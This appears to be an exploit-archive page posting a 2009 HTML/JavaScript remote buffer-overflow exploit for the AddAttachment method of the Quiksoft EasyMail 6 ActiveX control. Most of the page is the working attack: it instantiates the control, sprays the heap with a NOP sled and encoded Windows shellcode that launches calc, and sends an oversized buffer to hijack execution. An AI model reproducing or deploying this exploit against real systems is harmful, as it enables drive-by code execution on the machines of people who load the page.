exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Quiksoft EasyMail 6 Buffer Overflow

Quiksoft EasyMail 6 Buffer Overflow
Posted Sep 18, 2009
Authored by bmgsec | Site bmgsec.com.au

Quiksoft EasyMail version 6 AddAttachment remote buffer overflow exploit.

tags | exploit, remote, overflow
SHA-256 | 86aaf134931827daa4f5d15f9abd5058543e4fbe92eb443dc9158c073354f7c3

Quiksoft EasyMail 6 Buffer Overflow

Change Mirror Download
<html>
<head>
<!--
-- Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit
--
-- Its old and the latest version doesn't support this method.
-- I was bored and a similar post sparked my interest.
--
-- Advisory: http://www.bmgsec.com.au/advisory/48/
--
-- Written by:
-- bmgsec (bmgsec [at] gmail.com / www.bmgsec.com.au)
-- -->
<title>Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit</title>
<object classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9' id='test'></object>
<script language='javascript'>
function str_repeat ( input, multiplier ) {
return new Array(multiplier+1).join(input);
}

//windows/exec CMD: calc Size: 144 bytes Encoder: x86/shikata_ga_nai ExitFunc: SEH
shellcode = unescape("%uc931%u1eb1%ue2b8%udc1f%ud9cc%ud9e5%u2474%u5bf4%u4331%u830f%ufceb"+
"%u4303%ufde9%u3029%u4505%uc9d2%ucdd5%uf597%uad5e%u7e12%ua161%u3196"+
"%ub679%uedf6%u2378%u6541%u384e%u9753%ufe9f%ucbcd%u3e5b%u1499%u75a2"+
"%u1a6f%u61e6%u2784%u51b2%u2d61%u11df%ue936%ucd1e%u7aaf%u5a2c%u22bb"+
"%u5d30%u5750%ud654%u83a7%ub4ed%u5783%u1b2e%ua1fd%uf2d0%uc699%ucb56"+
"%u99ea%ua05a%u059d%u3dcf%u3e35%uba86%ufe45%u6af2%u0f22%u8f88%u87ed"+
"%u7114%u569b%u7173%u057b%ue11a%ucae7");

bigblock = unescape("%u9090%u9090");
headersize = 20;
slackspace = headersize + shellcode.length;

while (bigblock.length < slackspace)
bigblock += bigblock;

fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length - slackspace);

while (block.length + slackspace < 200000)
block = block + block + fillblock;

memory = new Array();
for (i=0; i<500; i++)
memory[i] = block + shellcode;

buffer = str_repeat('A', 433);
buffer += "BBBB";
buffer += str_repeat(unescape("%0b%0b%0b%0b"), 63);

test.AddAttachment(buffer, 1);
</script>
</head>
</html>

Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close